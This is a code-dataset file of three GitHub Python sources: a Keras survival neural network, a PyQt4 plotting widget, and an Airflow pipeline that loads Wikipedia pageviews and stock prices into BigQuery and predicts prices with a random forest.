+{"seq_id": "74515240807", "text": "from models.base import BaseModel\nimport numpy as np\nimport operator\nfrom keras import backend as K\nfrom keras.models import Model, Sequential\nfrom keras.layers import Input, Dense, concatenate, Dropout, Activation\nfrom keras import optimizers, applications, callbacks\nfrom keras.callbacks import ModelCheckpoint, ReduceLROnPlateau\nfrom lifelines.utils import concordance_index\nfrom keras.callbacks import LearningRateScheduler\nfrom abc import ABCMeta, abstractmethod\nfrom sklearn.metrics import roc_auc_score\nimport pandas as pd\n\n__author__ = 'Bonggun Shin','Sungsoo Park'\n\nclass MyCallback(ModelCheckpoint):\n def __init__(self, filepath, data, real_save=True, patience=20):\n super(MyCallback, self).__init__(filepath, save_weights_only=True)\n self.patience = patience\n\n self.x_trn, self.c_trn, self.s_trn, self.x_dev, self.c_dev, self.s_dev = data\n\n self.cindex_dev = 0\n self.cindex_best_epoch = 0\n self.real_save = real_save\n self.filepath_template = self.filepath+'-%s'\n self.max_epoch = 100\n\n def print_status(self):\n print('\\n=========================== [Best cindex (epoch = %d)] cindex=%f =================================='\n % (self.cindex_best_epoch, self.cindex_dev))\n\n\n def on_train_end(self, logs=None):\n print('[Best:on_train_end]')\n self.print_status()\n\n def on_epoch_end(self, epoch, logs=None):\n pred_dev = -np.exp(self.model.predict(self.x_dev, batch_size=1, verbose=0))\n cindex_dev = concordance_index(self.s_dev, pred_dev, self.c_dev)\n\n if self.cindex_dev < cindex_dev:\n self.cindex_dev = cindex_dev\n self.cindex_best_epoch = epoch\n if self.real_save is True:\n if self.save_weights_only:\n self.model.save_weights(self.filepath, overwrite=True)\n else:\n self.model.save(self.filepath, overwrite=True)\n\n else:\n if epoch - self.cindex_best_epoch > self.patience:\n self.model.stop_training = True\n print(\"Early stopping at %d\" % epoch)\n\n if epoch > self.max_epoch:\n self.model.stop_training = True\n print(\"Stopping at max epoch %d\" % epoch)\n\nclass SurvivalNeuralNet(BaseModel):\n def __init__(self, model_name, cancer, omics_type, out_folder, epochs=100):\n super(SurvivalNeuralNet, self).__init__(model_name, cancer, omics_type, out_folder)\n self.epochs = epochs\n self.model_name = model_name\n self.cancer = cancer\n self.omics_type = omics_type\n self.out_folder = out_folder\n\n @abstractmethod\n def get_model(self, input_size, dropout):\n pass\n\n def reset_weights(self):\n session = K.get_session()\n for layer in self.model.layers:\n if hasattr(layer, 'kernel_initializer'):\n layer.kernel.initializer.run(session=session)\n\n @abstractmethod\n def preprocess(self, x, n_feature):\n pass\n\n def feature_selection(self, x, c, s, names, fold, sel_num):\n pass\n\n def train(self, x, c, s, names, fold, n_feature=50):\n #learning_ratio = 1e-3\n n = x.shape[0]\n dev_index = n * 3 // 4\n\n x = self.preprocess(x, c, s, names, fold, n_feature, dev_index)\n x_trn, x_dev = x[:dev_index], x[dev_index:]\n c_trn, c_dev = 1 - c[:dev_index], 1 - c[dev_index:]\n s_trn, s_dev = s[:dev_index], s[dev_index:]\n\n sort_idx = np.argsort(s_trn)[::-1]\n x_trn = x_trn[sort_idx]\n s_trn = s_trn[sort_idx]\n c_trn = c_trn[sort_idx]\n\n def nll(E, NUM_E):\n def loss(y_true, y_pred):\n hazard_ratio = K.exp(y_pred)\n log_risk = K.log(K.cumsum(hazard_ratio))\n uncensored_likelihood = K.transpose(y_pred) - log_risk\n censored_likelihood = uncensored_likelihood * E\n neg_likelihood = -K.sum(censored_likelihood) / NUM_E\n return 
neg_likelihood\n\n return loss\n\n input_size = len(x[0])\n\n cindex_dev = {}\n # for dropout in [0.0, 0.5]:\n for dropout in [0.0]:\n self.model = self.get_model(input_size, dropout)\n for lr in [0.1, 0.01, 0.001, 0.0001]:\n print('############## Run at ', fold, dropout, lr) \n adam = optimizers.Adam(lr=lr)\n self.model.compile(loss=[nll(c_trn, np.sum(c_trn))], optimizer=adam)\n\n data = (x_trn, c_trn, s_trn, x_dev, c_dev, s_dev)\n modelpath = self.out_folder+'/%s/%s_(%d)_%0.1f_%0.5f.hdf5' % (self.model_name, self.cancer, fold, dropout, lr)\n\n checkpoint = MyCallback(modelpath, data)\n\n self.model.fit(x_trn, s_trn, epochs=self.epochs, batch_size=len(x_trn),\n verbose=0, shuffle=False, callbacks=[checkpoint])\n self.model.load_weights(modelpath)\n pred_raw = self.model.predict(x_dev, batch_size=1, verbose=1)\n pred_dev = -np.exp(pred_raw)\n cindex_dev_max = concordance_index(s_dev, pred_dev, c_dev)\n\n cindex_dev[modelpath] = cindex_dev_max\n\n self.reset_weights()\n\n self.bestmodelpath, self.cindex_dev_max = max(cindex_dev.items(), key=operator.itemgetter(1))\n\n return self.cindex_dev_max\n\n def evaluate(self, x, c, s, fold, n_feature=50, do_gse_eval=False):\n x = self.preprocess_eval(x)\n self.model.load_weights(self.bestmodelpath)\n pred_raw = self.model.predict(x, batch_size=1, verbose=1)\n pred_tst = -np.exp(pred_raw)\n self.cindex_tst_max = concordance_index(s, pred_tst, 1-c)\n\n K.clear_session()\n\n return self.cindex_tst_max", "repo_name": "deargen/DearCascadedWx", "sub_path": "src/models/neuralnet.py", "file_name": "neuralnet.py", "file_ext": "py", "file_size_in_byte": 5791, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "53", "api": [{"api_name": "keras.callbacks.ModelCheckpoint", "line_number": 17, "usage_type": "name"}, {"api_name": "numpy.exp", "line_number": 40, "usage_type": "call"}, {"api_name": "lifelines.utils.concordance_index", "line_number": 41, "usage_type": "call"}, {"api_name": "models.base.BaseModel", "line_number": 61, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 70, "usage_type": "name"}, {"api_name": "keras.backend.get_session", "line_number": 75, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 75, "usage_type": "name"}, {"api_name": "abc.abstractmethod", "line_number": 80, "usage_type": "name"}, {"api_name": "numpy.argsort", "line_number": 97, "usage_type": "call"}, {"api_name": "keras.backend.exp", "line_number": 104, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 104, "usage_type": "name"}, {"api_name": "keras.backend.log", "line_number": 105, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 105, "usage_type": "name"}, {"api_name": "keras.backend.cumsum", "line_number": 105, "usage_type": "call"}, {"api_name": "keras.backend.transpose", "line_number": 106, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 106, "usage_type": "name"}, {"api_name": "keras.backend.sum", "line_number": 108, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 108, "usage_type": "name"}, {"api_name": "keras.optimizers.Adam", "line_number": 121, "usage_type": "call"}, {"api_name": "keras.optimizers", "line_number": 121, "usage_type": "name"}, {"api_name": "numpy.sum", "line_number": 122, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 133, "usage_type": "call"}, {"api_name": "lifelines.utils.concordance_index", "line_number": 134, "usage_type": "call"}, {"api_name": 
"operator.itemgetter", "line_number": 140, "usage_type": "call"}, {"api_name": "numpy.exp", "line_number": 148, "usage_type": "call"}, {"api_name": "lifelines.utils.concordance_index", "line_number": 149, "usage_type": "call"}, {"api_name": "keras.backend.clear_session", "line_number": 151, "usage_type": "call"}, {"api_name": "keras.backend", "line_number": 151, "usage_type": "name"}]}
+{"seq_id": "30868743889", "text": "from PyQt4 import QtGui, QtCore\nfrom diagramme_compo import *\nfrom matplotlib.backends.backend_qt4agg import FigureCanvasQTAgg as FigureCanvas\n#from matplotlib.backends.backend_qt4agg import NavigationToolbar2QTAgg as NavigationToolbar\nfrom matplotlib.backends.backend_qt4agg import NavigationToolbar2QT as NavigationToolbar\nimport matplotlib.pyplot as plt\nimport matplotlib\n\nclass DiagrammeCompoWidget(QtGui.QWidget):\n def __init__(self,\n compo,\n compo2=None,\n fatigue=True,\n parent=None,\n nom_1=None,\n nom_2=None):\n super(DiagrammeCompoWidget, self).__init__(parent)\n self.compo = compo\n self.compo2 = compo2\n self.nom_1 = nom_1\n self.nom_2 = nom_2\n self.fatigue = fatigue\n\n self.lay = QtGui.QVBoxLayout()\n self.setLayout(self.lay)\n\n self.plot()\n\n def plot(self):\n #self.fig = plt.figure()\n #self.ax = self.fig.add_subplot(111)\n self.fig = plt.gcf()\n self.ax = plt.gca()\n self.canvas = FigureCanvas(self.fig)\n self.lay.addWidget(self.canvas)\n plt.axis('off')\n plt.close(self.fig)\n\n diagramme_etoile_compo(self.compo,\n fatigue=self.fatigue,\n ax=self.ax,\n compo2=self.compo2,\n nom_1=self.nom_1,\n nom_2=self.nom_2)\n", "repo_name": "ClementChardin/Test", "sub_path": "ui/diagramme_compo_widget.py", "file_name": "diagramme_compo_widget.py", "file_ext": "py", "file_size_in_byte": 1492, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "53", "api": [{"api_name": "PyQt4.QtGui.QWidget", "line_number": 9, "usage_type": "attribute"}, {"api_name": "PyQt4.QtGui", "line_number": 9, "usage_type": "name"}, {"api_name": "PyQt4.QtGui.QVBoxLayout", "line_number": 24, "usage_type": "call"}, {"api_name": "PyQt4.QtGui", "line_number": 24, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gcf", "line_number": 32, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 32, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.gca", "line_number": 33, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 33, "usage_type": "name"}, {"api_name": "matplotlib.backends.backend_qt4agg.FigureCanvasQTAgg", "line_number": 34, "usage_type": "call"}, {"api_name": "matplotlib.pyplot.axis", "line_number": 36, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 36, "usage_type": "name"}, {"api_name": "matplotlib.pyplot.close", "line_number": 37, "usage_type": "call"}, {"api_name": "matplotlib.pyplot", "line_number": 37, "usage_type": "name"}]}
+{"seq_id": "24119030905", "text": "from urllib import request\nimport datetime\nimport requests\nfrom bs4 import BeautifulSoup\nimport pytz\nfrom google.cloud import bigquery\nimport os\nimport sys\nfrom dotenv import load_dotenv\nimport pandas as pd\nimport json\nfrom yahoo_fin import stock_info as si\nfrom airflow.exceptions import AirflowException\nfrom sklearn.model_selection import train_test_split\nfrom sklearn.ensemble import RandomForestRegressor\n\n# Load env variables from .env\nload_dotenv()\n\n# Grab AIRFLOW_HOME env variable\nAIRFLOW_HOME = os.getenv('AIRFLOW_HOME')\n\n# Add airflow to sys.path\nsys.path.append(AIRFLOW_HOME)\n\nos.environ['GOOGLE_APPLICATION_CREDENTIALS'] = '/opt/airflow/config/ServiceKey_GoogleCloud.json'\n\n#### ####\n#### Helper Functions For load_pageviews.py ####\n#### ####\n\ndef get_latest_url(base_url = 'https://dumps.wikimedia.org/other/pageviews/'):\n '''\n Function: get_latest_url\n Summary: Get the latest url for the pageviews\n Args:\n base_url (str): Base url for the pageviews\n Returns:\n latest_url (str): Latest url for the pageviews\n Example of latest url: \n https://dumps.wikimedia.org/other/pageviews/2021/2021-06/\n '''\n # Set timezone to GMT\n tz = pytz.timezone('GMT')\n\n # Grab current year and month and generate latest url\n year = str(datetime.datetime.now(tz).year)\n month = '0' + str(datetime.datetime.now(tz).month)\n latest_url = f'{base_url}{(year)}/{(year)}-{month}/'\n return latest_url\n\ndef get_latest_link():\n '''\n Function: get_latest_link\n Summary: Get the latest link for the pageviews\n Args:\n latest_url (str): Latest url for the pageviews\n Returns:\n latest_link (str): Latest link for the pageviews\n Example of latest link:\n pageviews-20210619-170000.gz\n '''\n # Grab latest url and parse it using BeautifulSoup\n latest_url = get_latest_url()\n response = requests.get(latest_url)\n soup = BeautifulSoup(response.text, \"html.parser\")\n\n return [link.text for link in soup.find_all('a') if 'pageviews' in str(link)][-1]\n\n\ndef generate_curl_command():\n '''\n Function: generate_curl_command\n Summary: Generate curl command to download the latest pageviews\n Args:\n None\n Returns:\n curl_command (str): Curl command to download the latest pageviews\n Notes:\n The curl command will be used in the BashOperator\n Example: curl -o /tmp/wikipageviews.gz https://dumps.wikimedia.org/other/pageviews/2021/2021-06/projectviews-20210619-170000.gz\n '''\n # Generate the latest_link\n latest_url = get_latest_url()\n latest_link = get_latest_link()\n\n # Return curl command\n curl_command = f'curl -o /tmp/wikipageviews.gz {latest_url}{latest_link}'\n return curl_command\n\ndef generate_unzip_command():\n return 'gunzip --force /tmp/wikipageviews.gz'\n\n\ndef _fetch_pageviews(pagenames):\n '''\n Function: _fetch_pageviews\n Summary: Fetch pageviews for a given list of pagenames and export as csv\n Args:\n pagenames (list): List of pagenames\n Returns:\n None\n Notes:\n Example of csv file:\n Google, 100\n Amazon, 200\n Apple, 300\n '''\n def export_as_csv(result):\n latest_link = get_latest_link()\n with open(f\"/tmp/{latest_link}.csv\", 'w') as write_file:\n write_file.write(str(result))\n write_file.close()\n\n # Load pagenames into a dict\n result = dict.fromkeys(pagenames, 0)\n\n # Iterate through each line and extract the pageviews for each pagenames\n with open(f\"/tmp/wikipageviews\", \"r\") as f:\n for line in f:\n domain_code, page_title, view_counts, _ = line.split(\" \")\n if domain_code == \"en\" and page_title in 
pagenames:\n result[page_title] = view_counts\n f.close()\n \n # Print result and export as csv\n print(result)\n export_as_csv(result)\n\ndef connect_to_bigquery():\n '''\n Function: connect_to_bigquery\n Summary: Connect to BigQuery\n Args:\n None\n Returns:\n conn (obj): BigQuery connection object\n '''\n conn = bigquery.Client()\n return conn\n\ndef grab_table_id(conn, table_name, service_key_path='/opt/airflow/config/ServiceKey_GoogleCloud.json'):\n '''\n Function: grab_table_id\n Summary: Grab table id\n Args:\n conn (obj): BigQuery connection object\n Returns:\n table_id (str): Table id\n Template for table id:\n ProjectName.Datasetname.Tablename\n '''\n # Grab project name from service account json file\n project = conn.from_service_account_json(service_key_path).project\n \n # Generate and return table id\n dataset = conn.get_dataset('pageviews')\n table_id = f'{project}.{dataset.dataset_id}.{table_name}'\n return table_id\n\n\ndef today_date_from_latest_link():\n '''\n Function: today_date_from_latest_link\n Summary: Get the latest link available on https://dumps.wikimedia.org/other/pageviews/\n Args:\n None\n Returns:\n date (obj): Today's date\n '''\n latest_link = get_latest_link()\n latest_link = latest_link.replace(\"pageviews-\", \"\")[:-3]\n date = pd.to_datetime(latest_link, format='%Y%m%d-%H%M%S')\n return date\n\ndef _load_data():\n '''\n Function: _load_data\n Summary: \n - Convert csv file with pageviews to pandas dataframe\n - Generate a dataframe for the pageviews\n - Load the dataframe to BigQuery\n Args:\n None\n Returns:\n None\n '''\n\n # Grab latest link\n latest_link = get_latest_link()\n\n # Read csv file\n with open(f\"/tmp/{latest_link}.csv\", 'r') as read_file:\n # convert string - {'Apple': 0, 'Microsoft': 0, 'Facebook': 0, 'Google': 0, 'Amazon': 0} to dict\n new_string = ''\n for i in read_file.read():\n if i == \"'\":\n i = i.replace(\"'\", '\"')\n new_string += i # Generating a new string with double quotes\n df = json.loads(new_string) # Converting string to dict\n read_file.close()\n\n # Connect to BigQuery and grab table id\n conn = connect_to_bigquery()\n table_id = grab_table_id(conn, table_name='pageviews')\n\n date = today_date_from_latest_link()\n\n # Generate a Pandas dataframe from the dict\n df = pd.DataFrame(df.items(), columns=[\"company\", \"views\"])\n df['views'] = df['views'].astype('int64')\n df['date'] = date\n\n # Generate job config. 
Specify schema and write disposition\n job_config = bigquery.LoadJobConfig(\n schema=[\n bigquery.SchemaField(\"company\", bigquery.enums.SqlTypeNames.STRING, mode=\"REQUIRED\"),\n bigquery.SchemaField(\"views\", bigquery.enums.SqlTypeNames.INTEGER, mode=\"NULLABLE\"),\n bigquery.SchemaField(\"date\", bigquery.enums.SqlTypeNames.DATETIME, mode=\"REQUIRED\"),\n ],\n write_disposition=\"WRITE_APPEND\",\n )\n\n # Load data into BigQuery\n job = conn.load_table_from_dataframe(df, table_id, job_config=job_config)\n job.result()\n print(\"Loaded {} rows into {}.\".format(job.output_rows, table_id))\n\ndef grab_latest_link_from_bigquery():\n '''\n Function: grab_latest_link_from_bigquery\n Summary: Grab latest link from BigQuery\n Args:\n None\n Returns:\n latest_link (str): Latest link\n Format of latest link: 2023-06-28T04:00:00.000000000\n '''\n conn = connect_to_bigquery()\n table_id = grab_table_id(conn, table_name='pageviews')\n query = f\"\"\"\n SELECT max(date) as date\n FROM `{table_id}`\n \"\"\"\n query_job = conn.query(query)\n results = query_job.result().to_dataframe()\n results = results['date'].values[0]\n\n return results\n\ndef is_new_data_is_available():\n '''\n Function: check_if_new_data_is_available\n Summary: \n - Check if new data is available by comparing the latest link from BigQuery and the latest link from Wikipedia\n - If the latest link from Wikipedia is newer than the latest link from BigQuery, return True\n - Else, return False\n Args:\n None\n Returns:\n True or False (bool): True if new data is available, False otherwise\n '''\n # Grab date from latest link from BigQuery. If no data is available, return True\n try:\n latest_link_from_bigquery = grab_latest_link_from_bigquery()\n latest_link_from_bigquery = pd.to_datetime(latest_link_from_bigquery)\n except:\n return True\n\n # Grab date from latest link from Wikipedia\n latest_link_from_wikipedia = get_latest_link()\n latest_link_from_wikipedia = latest_link_from_wikipedia.replace(\"pageviews-\", \"\")[:-3]\n latest_link_from_wikipedia = pd.to_datetime(latest_link_from_wikipedia, format='%Y%m%d-%H%M%S')\n\n print(f\"Latest link from Wikipedia: {latest_link_from_wikipedia}\")\n print(f\"Latest link from BigQuery: {latest_link_from_bigquery}\")\n\n # Compare dates\n if latest_link_from_wikipedia > latest_link_from_bigquery:\n return True\n else:\n print(\"Data is up to date.\")\n raise AirflowException(\"Data is up to date.\")\n\ndef grab_current_rates():\n '''\n Function: grab_current_rates\n Summary:\n - Grab current rates for several companies using yahoo_fin\n - Generate a Pandas dataframe\n Args:\n None\n Returns:\n df (obj): Pandas dataframe \n '''\n quotes = ['META', 'AMZN', 'GOOGL', 'MSFT', 'AAPL']\n rates = {}\n \n # Grab rates\n for quote in quotes:\n rates[quote] = si.get_live_price(quote)\n\n df = pd.DataFrame(rates.items(), columns=['company', 'rate'])\n return df\n\ndef generate_rates_dataframe():\n '''\n Function: generate_rates_dataframe\n Summary: Generate rates dataframe\n Args:\n None\n Returns:\n df (obj): Pandas dataframe\n '''\n df = grab_current_rates()\n df['rate'] = df['rate'].astype(\"float64\")\n\n current_date = today_date_from_latest_link()\n df['date'] = current_date\n return df\n\ndef load_current_rates():\n '''\n Function: load_current_rates\n Summary: \n - Generate rates dataframe\n - Load rates dataframe into BigQuery\n Args:\n None\n Returns:\n None\n '''\n\n df = generate_rates_dataframe()\n conn = connect_to_bigquery()\n table_id = grab_table_id(conn, table_name='rates')\n\n # 
Generate job config. Specify schema and write disposition\n job_config = bigquery.LoadJobConfig(\n schema=[\n bigquery.SchemaField(\"company\", bigquery.enums.SqlTypeNames.STRING, mode=\"REQUIRED\"),\n bigquery.SchemaField(\"rate\", bigquery.enums.SqlTypeNames.FLOAT, mode=\"NULLABLE\"),\n bigquery.SchemaField(\"date\", bigquery.enums.SqlTypeNames.DATETIME, mode=\"REQUIRED\"),\n ],\n write_disposition=\"WRITE_APPEND\",\n )\n\n # Load data into BigQuery\n job = conn.load_table_from_dataframe(df, table_id, job_config=job_config)\n job.result()\n print(\"Loaded {} rows into {}.\".format(job.output_rows, table_id))\n\n\n#### ####\n#### Helper Functions For predict_rates.py ####\n#### ####\n\ndef pre_processing() -> pd.DataFrame:\n '''\n Function: pre_processing\n Summary:\n - Connect to bigquery and grab ALL data\n - seperate date column\n Args:\n None\n Returns:\n pageviews_df(dataframe)\n '''\n # Generate dataframe with ALL data from bigquery\n conn = connect_to_bigquery()\n query = \"SELECT * FROM pageviews-390416.pageviews.pageviews_ranks\"\n pageviews_df = conn.query(query).result().to_dataframe()\n \n # Seperate and drop date column\n pageviews_df['year'] = pd.to_datetime(pageviews_df['date']).dt.year\n pageviews_df['month'] = pd.to_datetime(pageviews_df['date']).dt.month\n pageviews_df['day'] = pd.to_datetime(pageviews_df['date']).dt.day\n pageviews_df['hour'] = pd.to_datetime(pageviews_df['date']).dt.hour\n pageviews_df['minute'] = pd.to_datetime(pageviews_df['date']).dt.minute\n pageviews_df['second'] = pd.to_datetime(pageviews_df['date']).dt.second\n pageviews_df = pageviews_df.drop(['date'], axis=1)\n\n return pageviews_df\n\ndef train_test_samples(x, y, test_size = 0.2):\n number_of_test_rows = int(len(x) * test_size)\n\n x_train = x.iloc[number_of_test_rows:,:].values\n x_test = x.iloc[:number_of_test_rows, :].values\n\n y_train = y[number_of_test_rows:].values\n y_test = y[:number_of_test_rows].values\n \n return x_train, y_train, x_test, y_test\n\ndef generate_x_y(df, company):\n company_df = df[df.company == company]\n x = company_df.drop(['rate' ,'company'], axis = 1)\n y = company_df.loc[:, 'rate']\n return x, y\n\ndef train_model(df, company):\n '''\n Function: train_model\n Summary:\n - Create train and test data from ALL data\n - Train and test model\n Args:\n df - dataframe with ALL data\n company - name of assert\n Returns:\n model(RanomForestRegressor model)\n '''\n # Create train and test data for each company(80% train, 20% test)\n x, y = generate_x_y(df, company)\n x_train, y_train, x_test, y_test = train_test_samples(x, y)\n\n # Train a RandomForest model\n model = RandomForestRegressor(n_estimators=50, random_state = 365)\n model.fit(x_train, y_train)\n\n # Print score\n print(f\"Model R^2 Score is: {model.score(x_test, y_test)}\")\n\n return model \n\ndef generate_new_data(company, date:pd.DatetimeIndex, pageviews:int) -> pd.DataFrame:\n '''\n Function: generate_new_data\n Summary:\n - Generate a dataframe with the views from the last hour\n - dataframe will have exactly the same format as the train dataframe\n - dataframe date will be one hour after the latest date in bigquery\n Args:\n company - name of assert\n date - latest date from bigquery\n pageviews - latest views from bigquery\n Returns:\n new_data_df(dataframe) \n '''\n new_data_df = pd.DataFrame()\n date = pd.to_datetime(date)\n\n new_data_df['pageviews'] = [pageviews]\n new_data_df['year'] = [date.year]\n new_data_df['month'] = [date.month]\n new_data_df['day'] = [date.day]\n new_data_df['hour'] = 
[date.hour+1]\n new_data_df['minute'] = [date.minute]\n new_data_df['second'] = [date.second]\n \n return new_data_df\n\ndef _predict_rates() -> pd.DataFrame:\n '''\n Function predict_rates()\n Summary:\n - Train model and predict new data for each company\n - Generate a dataframe for all next hour predictions\n Args:\n None\n Returns:\n predictions_df(dataframe)\n '''\n\n # Generate dataframe with ALL data from bigquery\n df = pre_processing()\n\n # Create dataframe for predictions\n predictions_df = pd.DataFrame()\n\n # For each company in the list predict the next hour rate\n for company in ['AMZN', 'GOOGL', 'META', 'MSFT', 'AAPL']:\n company_df = df[df[\"company\"] == company]\n \n # Get the latest date from bigquery\n date = grab_latest_link_from_bigquery()\n\n # generate new data for the next hour\n new_data = generate_new_data(company, date, company_df.views.values[-1])\n print(new_data)\n\n # Train model and predict new data\n model = train_model(company_df, company)\n prediction = model.predict(new_data)\n print(prediction)\n\n # Add prediction to dataframe\n predictions_df[company] = prediction\n\n # Export to csv\n predictions_df.to_csv('/tmp/predictions.csv', index=False)\n\ndef _generate_predictions_view():\n '''\n Function: generate_predictions_view\n Summary:\n - Generate a view with the predictions for the next hour\n Args:\n predictions_df(dataframe)\n Returns:\n None\n '''\n predictions_df = pd.read_csv('/tmp/predictions.csv')\n\n # Connect to bigquery\n conn = connect_to_bigquery()\n\n # Create dataframe for the view\n predictions_view_df = pd.DataFrame()\n predictions_view_df['current_AMZN'] = si.get_live_price(\"AMZN\")\n predictions_view_df['predicted_AMZN'] = predictions_df['AMZN']\n predictions_view_df['current_GOOGL'] = si.get_live_price(\"GOOGL\")\n predictions_view_df['predicted_GOOGL'] = predictions_df['GOOGL']\n predictions_view_df['current_META'] = si.get_live_price(\"META\")\n predictions_view_df['predicted_META'] = predictions_df['META']\n predictions_view_df['current_MSFT'] = si.get_live_price(\"MSFT\")\n predictions_view_df['predicted_MSFT'] = predictions_df['MSFT']\n predictions_view_df['current_AAPL'] = si.get_live_price(\"AAPL\")\n predictions_view_df['predicted_AAPL'] = predictions_df['AAPL']\n predictions_view_df['date'] = pd.to_datetime(grab_latest_link_from_bigquery())\n\n # Create view\n table_id = grab_table_id(conn=conn, service_key_path=\"/opt/airflow/config/ServiceKey_GoogleCloud.json\", table_name=\"predictions\")\n table = conn.get_table(table_id)\n conn.delete_table(table_id)\n job = conn.load_table_from_dataframe(predictions_view_df, table_id)\n job.result()\n\n print(\"Loaded {} rows into {}.\".format(job.output_rows, table_id))\n\n\n\ndef main():\n test_df = pre_processing()\n x, y = generate_x_y(test_df, 'GOOGL')\n x_train, y_train, x_test, y_test = train_test_samples(x, y)\n\n test_model = train_model(test_df, 'GOOGL')\n predictions_df = _predict_rates()\n #_generate_predictions_view(predictions_df)\n\nif __name__ == '__main__':\n main()\n\n\n", "repo_name": "bardadon/stock_pageviews", "sub_path": "airflow/helper/helper.py", "file_name": "helper.py", "file_ext": "py", "file_size_in_byte": 17388, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 2, "dataset": "github-code", "pt": "53", "api": [{"api_name": "dotenv.load_dotenv", "line_number": 18, "usage_type": "call"}, {"api_name": "os.getenv", "line_number": 21, "usage_type": "call"}, {"api_name": "sys.path.append", "line_number": 24, "usage_type": "call"}, 
{"api_name": "sys.path", "line_number": 24, "usage_type": "attribute"}, {"api_name": "os.environ", "line_number": 26, "usage_type": "attribute"}, {"api_name": "pytz.timezone", "line_number": 44, "usage_type": "call"}, {"api_name": "datetime.datetime.now", "line_number": 47, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 47, "usage_type": "attribute"}, {"api_name": "datetime.datetime.now", "line_number": 48, "usage_type": "call"}, {"api_name": "datetime.datetime", "line_number": 48, "usage_type": "attribute"}, {"api_name": "requests.get", "line_number": 65, "usage_type": "call"}, {"api_name": "bs4.BeautifulSoup", "line_number": 66, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.Client", "line_number": 139, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 139, "usage_type": "name"}, {"api_name": "pandas.to_datetime", "line_number": 173, "usage_type": "call"}, {"api_name": "json.loads", "line_number": 200, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 210, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.LoadJobConfig", "line_number": 215, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 215, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.SchemaField", "line_number": 217, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 217, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.enums", "line_number": 217, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.SchemaField", "line_number": 218, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 218, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.enums", "line_number": 218, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.SchemaField", "line_number": 219, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 219, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.enums", "line_number": 219, "usage_type": "attribute"}, {"api_name": "pandas.to_datetime", "line_number": 266, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 273, "usage_type": "call"}, {"api_name": "airflow.exceptions.AirflowException", "line_number": 283, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info.get_live_price", "line_number": 301, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info", "line_number": 301, "usage_type": "name"}, {"api_name": "pandas.DataFrame", "line_number": 303, "usage_type": "call"}, {"api_name": "google.cloud.bigquery.LoadJobConfig", "line_number": 339, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 339, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.SchemaField", "line_number": 341, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 341, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.enums", "line_number": 341, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.SchemaField", "line_number": 342, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 342, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.enums", "line_number": 342, "usage_type": "attribute"}, {"api_name": "google.cloud.bigquery.SchemaField", "line_number": 343, "usage_type": "call"}, {"api_name": "google.cloud.bigquery", "line_number": 343, "usage_type": "name"}, {"api_name": "google.cloud.bigquery.enums", "line_number": 343, "usage_type": "attribute"}, {"api_name": 
"pandas.to_datetime", "line_number": 375, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 376, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 377, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 378, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 379, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 380, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 358, "usage_type": "attribute"}, {"api_name": "sklearn.ensemble.RandomForestRegressor", "line_number": 419, "usage_type": "call"}, {"api_name": "pandas.DatetimeIndex", "line_number": 427, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 441, "usage_type": "call"}, {"api_name": "pandas.to_datetime", "line_number": 442, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 427, "usage_type": "attribute"}, {"api_name": "pandas.DataFrame", "line_number": 470, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 454, "usage_type": "attribute"}, {"api_name": "pandas.read_csv", "line_number": 504, "usage_type": "call"}, {"api_name": "pandas.DataFrame", "line_number": 510, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info.get_live_price", "line_number": 511, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info", "line_number": 511, "usage_type": "name"}, {"api_name": "yahoo_fin.stock_info.get_live_price", "line_number": 513, "usage_type": "call"}, {"api_name": "yahoo_fin.stock_info", "line_number": 513, "usage_type": "name"}, {"api_name": "yahoo_fin.stock_info.get_live_price", "line_number": 515, 